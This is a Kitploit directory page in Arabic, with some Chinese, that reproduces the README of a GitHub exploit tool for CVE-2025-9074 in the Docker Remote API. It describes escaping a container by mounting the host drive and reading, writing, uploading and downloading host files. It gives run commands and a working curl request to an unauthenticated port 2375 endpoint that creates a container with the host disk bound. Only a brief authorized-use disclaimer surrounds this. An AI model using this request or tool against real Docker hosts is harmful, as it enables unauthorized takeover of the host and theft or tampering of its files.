Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/shaoshi17/cve-2025-9074-docker-exploit
أمن الحاوياتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقأمن السحابةالفريق الأحمرالهروب من الحاوية
GitHubshaoshi17/cve-2025-9074-docker-exploit

CVE-2025-9074-Docker-Exploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

أداة قوية لاستغلال ثغرات Docker Remote API، مخصصة للبحث والاختبار الأمني لثغرة CVE-2025-9074.

عرض المستودع
12منذ 7 أشهرلم تتم المراجعة بعد

CVE-2025-9074 أداة تنفيذ أوامر حاويات Docker

أداة قوية لاستغلال ثغرات Docker Remote API، مصممة للبحث والاختبار الأمني لثغرة CVE-2025-9074.

المزايا الأساسية

✅ إدارة دورة حياة الحاويات تلقائيًا بالكامل: إنشاء حاويات مؤقتة تلقائيًا، وتنظيفها تلقائيًا بعد اكتمال العملية دون ترك أي أثر
✅ معالجة ذكية للمسارات: التعرف تلقائيًا على مسارات Windows وتحويلها إلى صيغة تثبيت Docker
✅ إجراءات تشغيل آلية بالكامل: دون الحاجة إلى إدخال أوامر معقدة يدويًا، تفاعل قائم على القوائم، وإتمام عمليات الملفات بضغطة واحدة
✅ توافق عبر المنصات: دعم كامل لأنظمة Windows و Linux

لقطات من بعض الوظائف

image

الميزات

  • عمليات الحاويات

    • عرض الحاويات قيد التشغيل
    • عرض جميع الحاويات (بما في ذلك المتوقفة)
    • إنشاء حاوية جديدة
    • إيقاف حاوية
    • حذف حاوية
    • تنفيذ أمر لمرة واحدة
    • طرفية تفاعلية (تتطلب مكتبة docker)
  • إدارة الصور

    • عرض الصور المحلية
    • سحب صور جديدة
    • حذف الصور
  • عمليات ملفات النظام المضيف

    • رفع ملفات إلى النظام المضيف
    • تنزيل ملفات من النظام المضيف
    • قراءة محتوى ملفات النظام المضيف
    • كتابة ملفات إلى النظام المضيف
    • معالجة تلقائية لتعيين مسارات Windows Docker Desktop

شرح الثغرة

CVE-2025-9074 هي ثغرة أمنية في Docker Remote API، يمكن للمهاجم من خلال الوصول غير المصرح به إلى Docker API:

  • تنفيذ أوامر عشوائية
  • إنشاء حاويات وتثبيت قرص النظام المضيف
  • تحقيق الهروب من الحاوية
  • قراءة/كتابة ملفات النظام المضيف

المتطلبات البيئية

  • Python 3.6+

تثبيت التبعيات

استخدم requirements.txt لتثبيت جميع التبعيات:

root@kitploit:~
pip install -r requirements.txt

أو التثبيت اليدوي:

root@kitploit:~
pip install requests docker websocket-client

طريقة الاستخدام

الاستخدام الأساسي

شغّل البرنامج النصي مباشرة باستخدام عنوان Docker API الافتراضي:

root@kitploit:~
python CVE-2025-9074-docker-exploit.py

تخصيص عنوان Docker API

root@kitploit:~
python CVE-2025-9074-docker-exploit.py -u http://192.168.1.100:2375

معاملات سطر الأوامر

root@kitploit:~
python CVE-2025-9074-docker-exploit.py [选项]

选项:
  -u, --url URL         Docker API 地址(默认: http://192.168.65.7:2375)

شرح تفصيلي للوظائف

عمليات الحاويات

  1. عرض الحاويات قيد التشغيل: عرض قائمة بجميع الحاويات قيد التشغيل
  2. عرض جميع الحاويات: عرض جميع الحاويات (بما في ذلك المتوقفة)
  3. إنشاء حاوية جديدة: إنشاء حاوية جديدة باستخدام صورة محددة
  4. إيقاف الحاوية: إيقاف الحاويات قيد التشغيل
  5. حذف الحاوية: حذف الحاوية (يمكن الحذف القسري)
  6. تنفيذ أمر لمرة واحدة: تنفيذ أمر واحد داخل الحاوية
  7. الطرفية التفاعلية: الدخول إلى shell تفاعلي داخل الحاوية (يتطلب مكتبة docker)

استخدام الطرفية التفاعلية

  1. بعد تشغيل البرنامج النصي، اختر "1. عمليات الحاويات"
  2. اختر "1. عرض الحاويات قيد التشغيل"
  3. أدخل رقم الحاوية لاختيارها
  4. اختر "2. الطرفية التفاعلية (تتطلب مكتبة docker)"
  5. أدخل أمر shell (الافتراضي: /bin/sh)
  6. ابدأ التشغيل التفاعلي

إدارة الصور

  1. عرض الصور: عرض جميع الصور المحلية
  2. سحب الصور: سحب صور جديدة من Docker Hub
  3. حذف الصور: حذف الصور المحلية

عمليات ملفات النظام المضيف

رفع ملف إلى النظام المضيف

root@kitploit:~
1. 上传文件到宿主机
请输入本地文件路径: /path/to/local/file.txt
请输入宿主机目标目录: D:/temp
请输入目标文件名 (留空则使用原文件名): 

تنزيل ملف من النظام المضيف

root@kitploit:~
2. 从宿主机下载文件
请输入宿主机文件路径: D:/temp/file.txt
请输入本地保存路径: /tmp

قراءة محتوى ملف من النظام المضيف

root@kitploit:~
3. 读取宿主机文件内容
请输入宿主机文件路径: D:/temp/file.txt

كتابة ملف إلى النظام المضيف

root@kitploit:~
4. 向宿主机写入文件
请输入宿主机目标目录: D:/temp
请输入文件内容: Hello, World!

تعيين مسارات Windows Docker Desktop

تقوم هذه الأداة تلقائيًا بمعالجة تعيين مسارات Windows Docker Desktop:

مسار Windows

صيغ الإدخال المدعومة:

  • D:\ أو D:/
  • D:\temp أو D:/temp
  • "D:\file.txt" (مع علامات اقتباس)
  • 'D:/file.txt' (مع علامات اقتباس)

ملاحظات الأمان

⚠️ تنبيه مهم:

  1. للاستخدام في الاختبارات المصرح بها فقط: تُستخدم هذه الأداة فقط للاختبارات الأمنية المصرح بها والأغراض التعليمية
  2. الامتثال القانوني: تأكد من الحصول على إذن صريح من النظام المستهدف قبل الاستخدام
  3. بيئة معزولة: يُنصح باستخدامها في بيئة اختبار معزولة
  4. قيود الصلاحيات: يتطلب Windows Docker Desktop التشغيل بصلاحيات المسؤول للكتابة على محرك C
  5. لا تسيء الاستخدام: قد يؤدي الاستخدام غير المصرح به لهذه الأداة إلى مخالفة القوانين واللوائح

المبدأ التقني

الهروب من الحاوية

إنشاء حاوية عبر Docker API وتثبيت قرص النظام المضيف:

root@kitploit:~
curl -X POST "http://<target>:2375/containers/create" \
  -H "Content-Type: application/json" \
  -d '{
    "Image": "python:3.11.7",
    "Cmd": ["sleep", "999d"],
    "HostConfig": {
      "Binds": ["/mnt/host/d:/tmp"]
    },
    "Tty": true
  }'

قراءة وكتابة الملفات

قراءة وكتابة ملفات النظام المضيف عبر تنفيذ أوامر داخل الحاوية:

root@kitploit:~
# 写入文件
echo "content" > /tmp/file.txt

# 读取文件
cat /tmp/file.txt

استكشاف الأخطاء وإصلاحها

فشل إنشاء الحاوية (خطأ 500)

  • تحقق من إمكانية الوصول إلى Docker API
  • تأكد من صحة تنسيق المسار
  • تحقق من وجود الصورة

فشل كتابة الملف

  • يتطلب Windows Docker Desktop التشغيل بصلاحيات المسؤول
  • تحقق من إعدادات صلاحيات الدليل الهدف

تعذر بدء تشغيل الطرفية التفاعلية

  • تأكد من تثبيت مكتبة docker: pip install docker websocket-client
  • تحقق مما إذا كانت الطرفية تدعم الوضع التفاعلي

التطوير والاختبار

تشغيل الاختبارات

root@kitploit:~
python CVE-2025-9074-docker-exploit.py

بنية الكود

root@kitploit:~
CVE-2025-9074-docker-exploit.py
├── 容器管理函数
│   ├── get_containers()
│   ├── display_containers()
│   ├── create_container()
│   ├── stop_container()
│   └── delete_container()
├── 镜像管理函数
│   ├── get_images()
│   ├── display_images()
│   ├── pull_image()
│   └── remove_image()
├── 宿主机文件操作函数
│   ├── upload_file_to_host()
│   ├── download_file_from_host()
│   ├── read_file_from_host()
│   └── write_file_to_host()
└── 工具函数
    ├── normalize_host_path()
    ├── create_container_with_mount()
    ├── start_container()
    └── stop_and_remove_container()

المساهمة

نرحب بتقديم Issues و Pull Requests!

الترخيص

هذا المشروع مخصص للاستخدام التعليمي والبحث الأمني فقط.

إخلاء المسؤولية

هذه الأداة مخصصة فقط للاختبارات الأمنية المصرح بها والأغراض التعليمية. يتحمل المستخدم كامل المسؤولية والمخاطر الناتجة عن استخدام هذه الأداة. لا يتحمل المؤلف أي مسؤولية عن أي إساءة استخدام أو استخدام غير مصرح به لهذه الأداة.

المراجع

  • تفاصيل ثغرة CVE-2025-9074
  • وثائق Docker Remote API
  • قواعد تعيين مسارات Windows Docker Desktop
تنزيل الأداة
مسار تثبيت Docker
D:\/mnt/host/d
D:\temp/mnt/host/d/temp
C:\Windows/mnt/host/c/Windows
C:\Users\test/mnt/host/c/Users/test